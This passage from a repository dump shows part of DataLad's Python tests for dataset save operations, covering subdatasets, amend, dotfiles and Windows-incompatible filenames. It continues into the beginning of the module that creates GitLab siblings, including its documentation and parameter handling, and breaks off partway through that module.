= parent.create(op.join('down', 'sub1'))\n assert_repo_status(parent.path)\n sub2 = parent.create('sub2')\n # next one make the parent dirty\n subsub = sub2.create('subsub')\n assert_repo_status(parent.path, modified=['sub2'])\n res = parent.save()\n assert_repo_status(parent.path)\n\n # now add content deep in the hierarchy\n create_tree(subsub.path, {'new': 'empty'})\n assert_repo_status(parent.path, modified=['sub2'])\n\n # recursive add should not even touch sub1, because\n # it knows that it is clean\n res = parent.save(recursive=True, jobs=5)\n # the key action is done\n assert_result_count(\n res, 1, path=op.join(subsub.path, 'new'), action='add', status='ok')\n # saved all the way up\n assert_result_count(res, 3, action='save', status='ok')\n assert_repo_status(parent.path)\n\n\n@with_tree(**tree_arg)\ndef test_relpath_add(path=None):\n ds = Dataset(path).create(force=True)\n with chpwd(op.join(path, 'dir')):\n eq_(save('testindir')[0]['path'],\n op.join(ds.path, 'dir', 'testindir'))\n # and now add all\n save('..')\n # auto-save enabled\n assert_repo_status(ds.path)\n\n\n@skip_wo_symlink_capability\n@with_tempfile()\ndef test_bf2541(path=None):\n ds = create(path)\n subds = ds.create('sub')\n assert_repo_status(ds.path)\n os.symlink('sub', op.join(ds.path, 'symlink'))\n with chpwd(ds.path):\n res = save(recursive=True)\n assert_repo_status(ds.path)\n\n\n@with_tempfile()\ndef test_remove_subds(path=None):\n ds = create(path)\n ds.create('sub')\n ds.create(op.join('sub', 'subsub'))\n assert_repo_status(ds.path)\n assert_result_count(\n ds.subdatasets(), 1,\n path=op.join(ds.path, 'sub'))\n # all good at this point, subdataset known, dataset clean\n # now have some external force wipe out the subdatasets\n rmtree(op.join(ds.path, 'sub'))\n assert_result_count(\n ds.status(), 1,\n path=op.join(ds.path, 'sub'),\n state='deleted')\n # a single call to save() must fix up the mess\n assert_status('ok', ds.save())\n assert_repo_status(ds.path)\n\n\n@with_tempfile()\ndef test_partial_unlocked(path=None):\n # https://github.com/datalad/datalad/issues/1651\n ds = create(path)\n (ds.pathobj / 'normal.txt').write_text(u'123')\n ds.save()\n assert_repo_status(ds.path)\n ds.unlock('normal.txt')\n ds.save()\n # mixed git and git-annex'ed files\n (ds.pathobj / 'ingit.txt').write_text(u'234')\n ds.save(to_git=True)\n (ds.pathobj / 'culprit.txt').write_text(u'345')\n (ds.pathobj / 'ingit.txt').write_text(u'modified')\n ds.save()\n assert_repo_status(ds.path)\n # but now a change in the attributes\n if '10.20220127' <= ds.repo.git_annex_version < '10.20220322':\n raise SkipTest(\"annex bug https://git-annex.branchable.com/bugs/Change_to_annex.largefiles_leaves_repo_modified/\")\n ds.unlock('culprit.txt')\n ds.repo.set_gitattributes([\n ('*', {'annex.largefiles': 'nothing'})])\n ds.save()\n assert_repo_status(ds.path)\n\n\n@with_tree({'.gitattributes': \"* annex.largefiles=(largerthan=4b)\",\n \"foo\": \"in annex\"})\ndef test_save_partial_commit_shrinking_annex(path=None):\n # This is a variation on the test above. The main difference is that there\n # are other staged changes in addition to the unlocked filed.\n ds = create(path, force=True)\n ds.save()\n assert_repo_status(ds.path)\n ds.unlock(path=\"foo\")\n create_tree(ds.path, tree={\"foo\": \"a\", \"staged\": \"\"},\n remove_existing=True)\n # Even without this staged change, a plain 'git commit -- foo' would fail\n # with git-annex's partial index error, but save (or more specifically\n # GitRepo.save_) drops the pathspec if there are no staged changes.\n ds.repo.add(\"staged\", git=True)\n ds.save(path=\"foo\")\n assert_repo_status(ds.path, added=[\"staged\"])\n\n\n@with_tempfile()\ndef test_path_arg_call(path=None):\n ds = create(path)\n for testfile in (\n ds.pathobj / 'abs.txt',\n ds.pathobj / 'rel.txt'):\n testfile.write_text(u'123')\n # we used to resolve relative paths against a dataset just given by\n # a path, but we no longer do that\n #save(dataset=ds.path, path=[testfile.name], to_git=True)\n save(dataset=ds, path=[testfile.name], to_git=True)\n\n\n# one can't create these file names on FAT/NTFS systems\n@skip_if_adjusted_branch\n@with_tempfile\ndef test_windows_incompatible_names(path=None):\n ds = Dataset(path).create()\n create_tree(path, {\n 'imgood': 'Look what a nice name I have',\n 'illegal:character.txt': 'strange choice of name',\n 'spaceending ': 'who does these things?',\n 'lookmumadot.': 'why would you do this?',\n 'COM1.txt': 'I am a serial port',\n 'dirs with spaces': {\n 'seriously?': 'you are stupid',\n 'why somuch?wrongstuff.': \"I gave up\"\n },\n })\n ds.repo.config.set('datalad.save.windows-compat-warning', 'error')\n ds.save('.datalad/config')\n res = ds.save(on_failure='ignore')\n # check that none of the 6 problematic files was saved, but the good one was\n assert_result_count(res, 6, status='impossible', action='save')\n assert_result_count(res, 1, status='ok', action='save')\n\n # check that the warning is emitted\n ds.repo.config.set('datalad.save.windows-compat-warning', 'warning')\n ds.save('.datalad/config')\n with swallow_logs(new_level=logging.WARN) as cml:\n ds.save()\n cml.assert_logged(\n \"Some elements of your dataset are not compatible with Windows \"\n \"systems. Disable this check by changing \"\n \"datalad.save.windows-compat-warning or consider renaming the \"\n \"following elements:\")\n assert_in(\"Elements using a reserved filename:\", cml.out)\n assert_in(\"Elements with illegal characters:\", cml.out)\n assert_in(\"Elements ending with a dot:\", cml.out)\n assert_in(\"Elements ending with a space:\", cml.out)\n\n # check that a setting of 'none' really does nothing\n ds.repo.config.set('datalad.save.windows-compat-warning', 'none')\n ds.save('.datalad/config')\n create_tree(path, {\n 'more illegal:characters?.py': 'My arch nemesis uses Windows and I will'\n 'destroy them! Muahahaha'\n })\n with swallow_logs(new_level=logging.WARN) as cml:\n res = ds.save()\n # we shouldn't see warnings\n assert_not_in(\n \"Some elements of your dataset are not compatible with Windows \"\n \"systems. Disable this check by changing \"\n \"datalad.save.windows-compat-warning or consider renaming the \"\n \"following elements:\", cml.out)\n # make sure the file is saved successfully\n assert_result_count(res, 1, status='ok', action='save')\n\n\n@with_tree(tree={\n 'file.txt': 'some text',\n 'd1': {\n 'subrepo': {\n 'subfile': 'more repo text',\n },\n },\n 'd2': {\n 'subds': {\n 'subfile': 'more ds text',\n },\n },\n})\ndef test_surprise_subds(path=None):\n # https://github.com/datalad/datalad/issues/3139\n ds = create(path, force=True)\n # a lonely repo without any commit\n somerepo = AnnexRepo(path=op.join(path, 'd1', 'subrepo'), create=True)\n # a proper subdataset\n subds = create(op.join(path, 'd2', 'subds'), force=True)\n\n # If subrepo is an adjusted branch, it would have a commit, making most of\n # this test irrelevant because it is about the unborn branch edge case.\n adjusted = somerepo.is_managed_branch()\n # This edge case goes away with Git v2.22.0.\n fixed_git = somerepo.git_version >= '2.22.0'\n\n # save non-recursive\n res = ds.save(recursive=False, on_failure='ignore')\n if not adjusted and fixed_git:\n # We get an appropriate error about no commit being checked out.\n assert_in_results(res, action='add_submodule', status='error')\n\n # the content of both subds and subrepo are not added to their\n # respective parent as no --recursive was given\n assert_repo_status(subds.path, untracked=['subfile'])\n assert_repo_status(somerepo.path, untracked=['subfile'])\n\n if adjusted or fixed_git:\n if adjusted:\n # adjusted branch: #datalad/3178 (that would have a commit)\n modified = [subds.repo.pathobj, somerepo.pathobj]\n untracked = []\n else:\n # Newer Git versions refuse to add a sub-repository with no commits\n # checked out.\n modified = [subds.repo.pathobj]\n untracked = ['d1']\n assert_repo_status(ds.path, modified=modified, untracked=untracked)\n assert_not_in(ds.repo.pathobj / 'd1' / 'subrepo' / 'subfile',\n ds.repo.get_content_info())\n else:\n # however, while the subdataset is added (and reported as modified\n # because it content is still untracked) the subrepo\n # cannot be added (it has no commit)\n # worse: its untracked file add been added to the superdataset\n assert_repo_status(ds.path, modified=['d2/subds'])\n assert_in(ds.repo.pathobj / 'd1' / 'subrepo' / 'subfile',\n ds.repo.get_content_info())\n # with proper subdatasets, all evil is gone\n assert_not_in(ds.repo.pathobj / 'd2' / 'subds' / 'subfile',\n ds.repo.get_content_info())\n\n\n@with_tree({\"foo\": \"\"})\ndef test_bf3285(path=None):\n ds = Dataset(path).create(force=True)\n # Note: Using repo.pathobj matters in the \"TMPDIR=/var/tmp/sym\\ link\" case\n # because assert_repo_status is based off of {Annex,Git}Repo.path, which is\n # the realpath'd path (from the processing in _flyweight_id_from_args).\n subds = create(ds.repo.pathobj.joinpath(\"subds\"))\n # Explicitly saving a path does not save an untracked, unspecified\n # subdataset.\n ds.save(\"foo\")\n assert_repo_status(ds.path, untracked=[subds.path])\n\n\n@with_tree({\"outside\": \"\",\n \"ds\": {\"within\": \"\"}})\ndef test_on_failure_continue(path=None):\n ds = Dataset(op.join(path, \"ds\")).create(force=True)\n # save() calls status() in a way that respects on_failure.\n assert_in_results(\n ds.save(path=[op.join(path, \"outside\"),\n op.join(path, \"ds\", \"within\")],\n on_failure=\"ignore\"),\n action=\"status\",\n status=\"error\")\n # save() continued despite the failure and saved ds/within.\n assert_repo_status(ds.path)\n\n\n@with_tree(tree={OBSCURE_FILENAME: \"abc\"})\ndef test_save_obscure_name(path=None):\n ds = Dataset(path).create(force=True)\n fname = OBSCURE_FILENAME\n # Just check that we don't fail with a unicode error.\n with swallow_outputs():\n ds.save(path=fname, result_renderer=\"default\")\n\n\n@with_tree(tree={\n \".dot\": \"ab\", \"nodot\": \"cd\",\n \"nodot-subdir\": {\".dot\": \"ef\", \"nodot\": \"gh\"},\n \".dot-subdir\": {\".dot\": \"ij\", \"nodot\": \"kl\"}})\ndef check_save_dotfiles(to_git, save_path, path):\n # Note: Take relpath to work with Travis \"TMPDIR=/var/tmp/sym\\ link\" run.\n paths = [Path(op.relpath(op.join(root, fname), path))\n for root, _, fnames in os.walk(op.join(path, save_path or \"\"))\n for fname in fnames]\n ok_(paths)\n ds = Dataset(path).create(force=True)\n ds.save(save_path, to_git=to_git)\n if save_path is None:\n assert_repo_status(ds.path)\n repo = ds.repo\n annexinfo = repo.get_content_annexinfo()\n\n def _check(fn, p):\n fn(\"key\", annexinfo[repo.pathobj / p], p)\n\n if to_git:\n def check(p):\n _check(assert_not_in, p)\n else:\n def check(p):\n _check(assert_in, p)\n\n for path in paths:\n check(path)\n\n\[email protected](\n \"git,save_path\",\n itertools.product(\n [True, False, None],\n [None, \"nodot-subdir\"],\n )\n)\ndef test_save_dotfiles(git, save_path):\n check_save_dotfiles(git, save_path)\n\n\n@with_tempfile\ndef test_save_nested_subs_explicit_paths(path=None):\n ds = Dataset(path).create()\n spaths = [Path(\"s1\"), Path(\"s1\", \"s2\"), Path(\"s1\", \"s2\", \"s3\")]\n for spath in spaths:\n Dataset(ds.pathobj / spath).create()\n ds.save(path=spaths)\n eq_(set(ds.subdatasets(recursive=True, result_xfm=\"relpaths\")),\n set(map(str, spaths)))\n\n\n@with_tempfile\ndef test_save_gitrepo_annex_subds_adjusted(path=None):\n ds = Dataset(path).create(annex=False)\n subds = ds.create(\"sub\")\n maybe_adjust_repo(subds.repo)\n (subds.pathobj / \"foo\").write_text(\"foo\")\n subds.save()\n ds.save()\n assert_repo_status(ds.path)\n\n\n@known_failure\n@with_tempfile\ndef test_save_adjusted_partial(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"sub\")\n maybe_adjust_repo(subds.repo)\n (subds.pathobj / \"foo\").write_text(\"foo\")\n subds.save()\n (ds.pathobj / \"other\").write_text(\"staged, not for committing\")\n ds.repo.call_git([\"add\", \"other\"])\n ds.save(path=[\"sub\"])\n assert_repo_status(ds.path, added=[\"other\"])\n\n\n@with_tempfile\ndef test_save_diff_ignore_submodules_config(path=None):\n ds = Dataset(path).create()\n subds = ds.create(\"sub\")\n (subds.pathobj / \"foo\").write_text(\"foo\")\n subds.save()\n ds.repo.config.set(\"diff.ignoreSubmodules\", \"all\",\n scope=\"local\", reload=True)\n # Saving a subdataset doesn't fail when diff.ignoreSubmodules=all.\n ds.save()\n assert_repo_status(ds.path)\n\n\n@with_tree({\"subdir\": {\"foo\": \"foocontent\"}})\ndef test_save_git_mv_fixup(path=None):\n ds = Dataset(path).create(force=True)\n ds.save()\n assert_repo_status(ds.path)\n ds.repo.call_git([\"mv\", op.join(\"subdir\", \"foo\"), \"foo\"])\n ds.save()\n # Was link adjusted properly? (gh-3686)\n assert (ds.pathobj / 'foo').read_text() == \"foocontent\"\n # all clean\n assert_repo_status(ds.path)\n\n\n@with_tree(tree={'somefile': 'file content',\n 'subds': {'file_in_sub': 'other'}})\ndef test_save_amend(dspath=None):\n\n dspath = Path(dspath)\n file_in_super = dspath / 'somefile'\n file_in_sub = dspath / 'subds' / 'file_in_sub'\n\n # test on a hierarchy including a plain git repo:\n ds = Dataset(dspath).create(force=True, annex=False)\n subds = ds.create('subds', force=True)\n ds.save(recursive=True)\n assert_repo_status(ds.repo)\n\n # recursive and amend are mutually exclusive:\n for d in (ds, subds):\n assert_raises(ValueError, d.save, recursive=True, amend=True)\n\n # in an annex repo the branch we are interested in might not be the active\n # branch (adjusted):\n sub_branch = subds.repo.get_corresponding_branch()\n\n # amend in subdataset w/ new message; otherwise empty amendment:\n last_sha = subds.repo.get_hexsha(sub_branch)\n subds.save(message=\"new message in sub\", amend=True)\n # we did in fact commit something:\n neq_(last_sha, subds.repo.get_hexsha(sub_branch))\n # repo is clean:\n assert_repo_status(subds.repo)\n # message is correct:\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n # actually replaced the previous commit:\n assert_not_in(last_sha, subds.repo.get_branch_commits_(sub_branch))\n\n # amend modifications in subdataset w/o new message\n if not subds.repo.is_managed_branch():\n subds.unlock('file_in_sub')\n file_in_sub.write_text(\"modified again\")\n last_sha = subds.repo.get_hexsha(sub_branch)\n subds.save(amend=True)\n neq_(last_sha, subds.repo.get_hexsha(sub_branch))\n assert_repo_status(subds.repo)\n # message unchanged:\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n # actually replaced the previous commit:\n assert_not_in(last_sha, subds.repo.get_branch_commits_(sub_branch))\n\n # save --amend with nothing to amend with:\n res = subds.save(amend=True)\n assert_result_count(res, 1)\n assert_result_count(res, 1, status='notneeded', action='save')\n\n # amend in superdataset w/ new message; otherwise empty amendment:\n last_sha = ds.repo.get_hexsha()\n ds.save(message=\"new message in super\", amend=True)\n neq_(last_sha, ds.repo.get_hexsha())\n assert_repo_status(subds.repo)\n eq_(ds.repo.format_commit(\"%B\").strip(), \"new message in super\")\n assert_not_in(last_sha, ds.repo.get_branch_commits_())\n\n # amend modifications in superdataset w/o new message\n file_in_super.write_text(\"changed content\")\n if not subds.repo.is_managed_branch():\n subds.unlock('file_in_sub')\n file_in_sub.write_text(\"modified once again\")\n last_sha = ds.repo.get_hexsha()\n last_sha_sub = subds.repo.get_hexsha(sub_branch)\n ds.save(amend=True)\n neq_(last_sha, ds.repo.get_hexsha())\n eq_(ds.repo.format_commit(\"%B\").strip(), \"new message in super\")\n assert_not_in(last_sha, ds.repo.get_branch_commits_())\n # we didn't mess with the subds:\n assert_repo_status(ds.repo, modified=[\"subds\"])\n eq_(last_sha_sub, subds.repo.get_hexsha(sub_branch))\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n\n # save --amend with nothing to amend with:\n last_sha = ds.repo.get_hexsha()\n res = ds.save(amend=True)\n assert_result_count(res, 1)\n assert_result_count(res, 1, status='notneeded', action='save')\n eq_(last_sha, ds.repo.get_hexsha())\n # we didn't mess with the subds:\n assert_repo_status(ds.repo, modified=[\"subds\"])\n eq_(last_sha_sub, subds.repo.get_hexsha(sub_branch))\n eq_(subds.repo.format_commit(\"%B\", sub_branch).strip(),\n \"new message in sub\")\n\n # amend with different identity:\n orig_author = ds.repo.format_commit(\"%an\")\n orig_email = ds.repo.format_commit(\"%ae\")\n orig_date = ds.repo.format_commit(\"%ad\")\n orig_committer = ds.repo.format_commit(\"%cn\")\n orig_committer_mail = ds.repo.format_commit(\"%ce\")\n eq_(orig_author, orig_committer)\n eq_(orig_email, orig_committer_mail)\n with patch.dict('os.environ',\n {'GIT_COMMITTER_NAME': 'Hopefully Different',\n 'GIT_COMMITTER_EMAIL': '[email protected]'}):\n\n ds.config.reload(force=True)\n ds.save(amend=True, message=\"amend with hope\")\n # author was kept:\n eq_(orig_author, ds.repo.format_commit(\"%an\"))\n eq_(orig_email, ds.repo.format_commit(\"%ae\"))\n eq_(orig_date, ds.repo.format_commit(\"%ad\"))\n # committer changed:\n eq_(ds.repo.format_commit(\"%cn\"), \"Hopefully Different\")\n eq_(ds.repo.format_commit(\"%ce\"), \"[email protected]\")\n\n # corner case: amend empty commit with no parent:\n rmtree(str(dspath))\n # When adjusted branch is enforced by git-annex detecting a crippled FS,\n # git-annex produces an empty commit before switching to adjusted branch:\n # \"commit before entering adjusted branch\"\n # The commit by `create` would be the second one already.\n # Therefore go with plain annex repo and create an (empty) commit only when\n # not on adjusted branch:\n repo = AnnexRepo(dspath, create=True)\n if not repo.is_managed_branch():\n repo.commit(msg=\"initial\", options=['--allow-empty'])\n ds = Dataset(dspath)\n branch = ds.repo.get_corresponding_branch() or ds.repo.get_active_branch()\n # test pointless if we start with more than one commit\n eq_(len(list(ds.repo.get_branch_commits_(branch))),\n 1,\n msg=\"More than on commit '{}': {}\".format(\n branch, ds.repo.call_git(['log', branch]))\n )\n last_sha = ds.repo.get_hexsha(branch)\n\n ds.save(message=\"new initial commit\", amend=True)\n assert_repo_status(ds.repo)\n eq_(len(list(ds.repo.get_branch_commits_(branch))),\n 1,\n msg=\"More than on commit '{}': {}\".format(\n branch, ds.repo.call_git(['log', branch]))\n )\n assert_not_in(last_sha, ds.repo.get_branch_commits_(branch))\n eq_(ds.repo.format_commit(\"%B\", branch).strip(), \"new initial commit\")\n\n\n@with_tempfile\ndef test_save_sub_trailing_sep_bf6547(path=None):\n ds = Dataset(path).create()\n # create not-yet-subdataset inside\n subds = Dataset(ds.pathobj / 'sub').create()\n ds.save(path='sub' + os.path.sep)\n assert_in_results(\n ds.subdatasets(result_renderer='disabled'),\n path=subds.path,\n )\n # make sure it has the .gitmodules record\n assert 'sub' in (ds.pathobj / '.gitmodules').read_text()\n" }, { "alpha_fraction": 0.5619733333587646, "alphanum_fraction": 0.56272953748703, "avg_line_length": 40.69669723510742, "blob_id": "a5b2ec2e44a21634fd4974923489075699d0791a", "content_id": "e4c31c8816f655b948e14f234a90ce4381bc5f0c", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 27770, "license_type": "permissive", "max_line_length": 113, "num_lines": 666, "path": "/datalad/distributed/create_sibling_gitlab.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"High-level interface for creating a publication target on a GitLab instance\n\"\"\"\n\n__docformat__ = 'restructuredtext'\n\n\nimport logging\nimport warnings\n\nfrom datalad.support.exceptions import CapturedException\n\nfrom ..distribution.dataset import (\n EnsureDataset,\n datasetmethod,\n require_dataset,\n resolve_path,\n)\n# bound methods\nfrom ..distribution.siblings import Siblings\nfrom ..dochelpers import exc_str\nfrom ..interface.base import (\n Interface,\n build_doc,\n eval_results,\n)\nfrom ..interface.common_opts import (\n publish_depends,\n recursion_flag,\n recursion_limit,\n)\nfrom ..local.subdatasets import Subdatasets\nfrom ..support.constraints import (\n EnsureChoice,\n EnsureNone,\n EnsureStr,\n)\nfrom ..support.param import Parameter\nfrom ..utils import ensure_list\n\nlgr = logging.getLogger('datalad.distributed.create_sibling_gitlab')\n\nknown_layout_labels = ('collection', 'flat')\nknown_access_labels = ('http', 'ssh', 'ssh+http')\n\n\n@build_doc\nclass CreateSiblingGitlab(Interface):\n \"\"\"Create dataset sibling at a GitLab site\n\n An existing GitLab project, or a project created via the GitLab web\n interface can be configured as a sibling with the :command:`siblings`\n command. Alternatively, this command can create a GitLab project at any\n location/path a given user has appropriate permissions for. This is\n particularly helpful for recursive sibling creation for subdatasets. API\n access and authentication are implemented via python-gitlab, and all its\n features are supported. A particular GitLab site must be configured in a\n named section of a python-gitlab.cfg file (see\n https://python-gitlab.readthedocs.io/en/stable/cli-usage.html#configuration-file-format\n for details), such as::\n\n [mygit]\n url = https://git.example.com\n api_version = 4\n private_token = abcdefghijklmnopqrst\n\n Subsequently, this site is identified by its name ('mygit' in the example\n above).\n\n (Recursive) sibling creation for all, or a selected subset of subdatasets\n is supported with two different project layouts (see --layout):\n\n \"flat\"\n All datasets are placed as GitLab projects in the same group. The project name\n of the top-level dataset follows the configured\n datalad.gitlab-SITENAME-project configuration. The project names of\n contained subdatasets extend the configured name with the subdatasets'\n s relative path within the root dataset, with all path separator\n characters replaced by '-'. This path separator is configurable\n (see Configuration).\n \"collection\"\n A new group is created for the dataset hierarchy, following the\n datalad.gitlab-SITENAME-project configuration. The root dataset is placed\n in a \"project\" project inside this group, and all nested subdatasets are\n represented inside the group using a \"flat\" layout. The root datasets\n project name is configurable (see Configuration).\n\n GitLab cannot host dataset content. However, in combination with\n other data sources (and siblings), publishing a dataset to GitLab can\n facilitate distribution and exchange, while still allowing any dataset\n consumer to obtain actual data content from alternative sources.\n\n *Configuration*\n\n Many configuration switches and options for GitLab sibling creation can\n be provided as arguments to the command. However, it is also possible to\n specify a particular setup in a dataset's configuration. This is\n particularly important when managing large collections of datasets.\n Configuration options are:\n\n \"datalad.gitlab-default-site\"\n Name of the default GitLab site (see --site)\n \"datalad.gitlab-SITENAME-siblingname\"\n Name of the sibling configured for the local dataset that points\n to the GitLab instance SITENAME (see --name)\n \"datalad.gitlab-SITENAME-layout\"\n Project layout used at the GitLab instance SITENAME (see --layout)\n \"datalad.gitlab-SITENAME-access\"\n Access method used for the GitLab instance SITENAME (see --access)\n \"datalad.gitlab-SITENAME-project\"\n Project \"location/path\" used for a datasets at GitLab instance\n SITENAME (see --project). Configuring this is useful for deriving\n project paths for subdatasets, relative to superdataset.\n The root-level group (\"location\") needs to be created beforehand via\n GitLab's web interface.\n \"datalad.gitlab-default-projectname\"\n The collection layout publishes (sub)datasets as projects\n with a custom name. The default name \"project\" can be overridden with\n this configuration.\n \"datalad.gitlab-default-pathseparator\"\n The flat and collection layout represent subdatasets with project names\n that correspond to their path within the superdataset, with the regular path separator replaced\n with a \"-\": superdataset-subdataset. This configuration can be used to override\n this default separator.\n\n This command can be configured with\n \"datalad.create-sibling-ghlike.extra-remote-settings.NETLOC.KEY=VALUE\" in\n order to add any local KEY = VALUE configuration to the created sibling in\n the local `.git/config` file. NETLOC is the domain of the Gitlab instance to\n apply the configuration for.\n This leads to a behavior that is equivalent to calling datalad's\n ``siblings('configure', ...)``||``siblings configure`` command with the\n respective KEY-VALUE pair after creating the sibling.\n The configuration, like any other, could be set at user- or system level, so\n users do not need to add this configuration to every sibling created with\n the service at NETLOC themselves.\n\n \"\"\"\n _params_ = dict(\n path=Parameter(\n args=('path',),\n metavar='PATH',\n nargs='*',\n doc=\"\"\"selectively create siblings for any datasets underneath a given\n path. By default only the root dataset is considered.\"\"\"),\n dataset=Parameter(\n args=(\"--dataset\", \"-d\",),\n doc=\"\"\"reference or root dataset. If no path constraints are given,\n a sibling for this dataset will be created. In this and all other\n cases, the reference dataset is also consulted for the GitLab\n configuration, and desired project layout. If no dataset is given,\n an attempt is made to identify the dataset based on the current\n working directory\"\"\",\n constraints=EnsureDataset() | EnsureNone()),\n site=Parameter(\n args=('--site',),\n metavar='SITENAME',\n doc=\"\"\"name of the GitLab site to create a sibling at. Must match an\n existing python-gitlab configuration section with location and\n authentication settings (see\n https://python-gitlab.readthedocs.io/en/stable/cli-usage.html#configuration).\n By default the dataset configuration is consulted.\n \"\"\",\n constraints=EnsureNone() | EnsureStr()),\n project=Parameter(\n args=('--project',),\n metavar='NAME/LOCATION',\n doc=\"\"\"project name/location at the GitLab site. If a subdataset of the\n reference dataset is processed, its project path is automatically\n determined by the `layout` configuration, by default. Users need to\n create the root-level GitLab group (NAME) via the webinterface\n before running the command.\n \"\"\",\n constraints=EnsureNone() | EnsureStr()),\n layout=Parameter(\n args=('--layout',),\n constraints=EnsureChoice(None, *known_layout_labels),\n doc=\"\"\"layout of projects at the GitLab site, if a collection, or\n a hierarchy of datasets and subdatasets is to be created.\n By default the dataset configuration is consulted.\n \"\"\"),\n recursive=recursion_flag,\n recursion_limit=recursion_limit,\n name=Parameter(\n args=('-s', '--name',),\n metavar='NAME',\n doc=\"\"\"name to represent the GitLab sibling remote in the local\n dataset installation. If not specified a name is looked up in the\n dataset configuration, or defaults to the `site` name\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n existing=Parameter(\n args=(\"--existing\",),\n constraints=EnsureChoice('skip', 'error', 'reconfigure'),\n doc=\"\"\"desired behavior when already existing or configured\n siblings are discovered. 'skip': ignore; 'error': fail, if access\n URLs differ; 'reconfigure': use the existing repository and\n reconfigure the local dataset to use it as a sibling\"\"\",),\n access=Parameter(\n args=(\"--access\",),\n constraints=EnsureChoice(None, *known_access_labels),\n doc=\"\"\"access method used for data transfer to and from the sibling.\n 'ssh': read and write access used the SSH protocol; 'http': read and\n write access use HTTP requests; 'ssh+http': read access is done via\n HTTP and write access performed with SSH. Dataset configuration is\n consulted for a default, 'http' is used otherwise.\"\"\",),\n description=Parameter(\n args=(\"--description\",),\n doc=\"\"\"brief description for the GitLab project (displayed on the\n site)\"\"\",\n constraints=EnsureStr() | EnsureNone()),\n publish_depends=publish_depends,\n dry_run=Parameter(\n args=(\"--dry-run\",),\n action=\"store_true\",\n doc=\"\"\"if set, no repository will be created, only tests for\n name collisions will be performed, and would-be repository names\n are reported for all relevant datasets\"\"\"),\n dryrun=Parameter(\n args=(\"--dryrun\",),\n action=\"store_true\",\n doc=\"\"\"Deprecated. Use the renamed\n ``dry_run||--dry-run`` parameter\"\"\")\n )\n\n @staticmethod\n @datasetmethod(name='create_sibling_gitlab')\n @eval_results\n def __call__(\n path=None,\n *,\n site=None,\n project=None,\n layout=None,\n dataset=None,\n recursive=False,\n recursion_limit=None,\n name=None,\n existing='error',\n access=None,\n publish_depends=None,\n description=None,\n dryrun=False,\n dry_run=False):\n if dryrun and not dry_run:\n # the old one is used, and not in agreement with the new one\n warnings.warn(\n \"datalad-create-sibling-github's `dryrun` option is \"\n \"deprecated and will be removed in a future release, \"\n \"use the renamed `dry_run/--dry-run` option instead.\",\n DeprecationWarning)\n dry_run = dryrun\n path = resolve_path(ensure_list(path), ds=dataset) \\\n if path else None\n\n if project and (recursive or (path and len(path) > 1)):\n raise ValueError(\n 'Providing a GitLab project name/location cannot be combined '\n 'with recursive operation or multiple paths, as each dataset '\n 'needs to be mapped onto its own individual project.')\n # what to operate on\n ds = require_dataset(\n dataset, check_installed=True, purpose='create GitLab sibling(s)')\n\n # cache for objects of gitlab sites (we could face different ones\n # in a single hierarchy, cache them to avoid duplicate initialization\n # while still being able to process each dataset individually\n siteobjs = dict()\n\n # which datasets to process?\n if path is None or ds.pathobj in path:\n for r in _proc_dataset(\n ds, ds,\n site, project, name, layout, existing, access,\n dry_run, siteobjs, publish_depends, description):\n yield r\n # we need to find a subdataset when recursing, or when there is a path that\n # could point to one, we have to exclude the parent dataset in this test\n # to avoid undesired level-1 recursion into subdatasets\n if any(p != ds.pathobj for p in (path or [])) or recursive:\n # also include any matching subdatasets\n subds = ds.subdatasets(\n path=path,\n # we can only operate on present datasets\n state='present',\n recursive=recursive,\n recursion_limit=recursion_limit,\n contains=None,\n bottomup=False,\n result_xfm='datasets',\n result_renderer='disabled',\n return_type='list')\n if not subds:\n # we didn't find anything to operate on, let the user know\n res_kwargs = {'status': 'impossible', 'refds': ds.path,\n 'type':'dataset', 'logger': lgr,\n 'action': 'create_sibling_gitlab'}\n if path is not None:\n for p in path:\n yield dict(\n path=p,\n message=('No installed dataset found under %s, forgot to \"get\" it?' % p),\n **res_kwargs\n )\n else:\n yield dict(\n path=ds.path,\n message=('No installed subdatasets found underneath %s, forgot to \"get\" any?' % ds.path),\n **res_kwargs)\n else:\n for sub in subds:\n for r in _proc_dataset(\n ds, sub,\n site, project, name, layout, existing, access,\n dry_run, siteobjs, publish_depends, description):\n yield r\n\n return\n\n\ndef _proc_dataset(refds, ds, site, project, remotename, layout, existing,\n access, dry_run, siteobjs, depends, description):\n # basic result setup\n res_kwargs = dict(\n action='create_sibling_gitlab',\n refds=refds.path,\n path=ds.path,\n type='dataset',\n logger=lgr,\n )\n if description:\n res_kwargs['description'] = description\n\n if site is None:\n # always try pulling the base config from a parent dataset\n # even if paths were given (may be overwritten later)\n basecfgsite = ds.config.get('datalad.gitlab-default-site', None)\n\n # let the dataset config overwrite the target site, if none\n # was given\n site = refds.config.get(\n 'datalad.gitlab-default-site', basecfgsite) \\\n if site is None else site\n if site is None:\n # this means the most top-level dataset has no idea about\n # gitlab, and no site was specified as an argument\n # fail rather then give an error result, as this is very\n # unlikely to be intentional\n raise ValueError(\n 'No GitLab site was specified (--site) or configured '\n 'in {} (datalad.gitlab.default-site)'.format(ds))\n res_kwargs['site'] = site\n\n # determine target remote name, unless given\n if remotename is None:\n remotename_var = 'datalad.gitlab-{}-siblingname'.format(site)\n remotename = ds.config.get(\n remotename_var,\n # use config from parent, if needed\n refds.config.get(\n remotename_var,\n # fall back on site name, if nothing else can be used\n site))\n res_kwargs['sibling'] = remotename\n # check against existing remotes\n dremotes = {\n r['name']: r\n for r in ds.siblings(\n action='query',\n # fastest possible\n get_annex_info=False,\n recursive=False,\n return_type='generator',\n result_renderer='disabled')\n }\n if remotename in dremotes and existing not in ['replace', 'reconfigure']:\n # we already know a sibling with this name\n yield dict(\n res_kwargs,\n status='error' if existing == 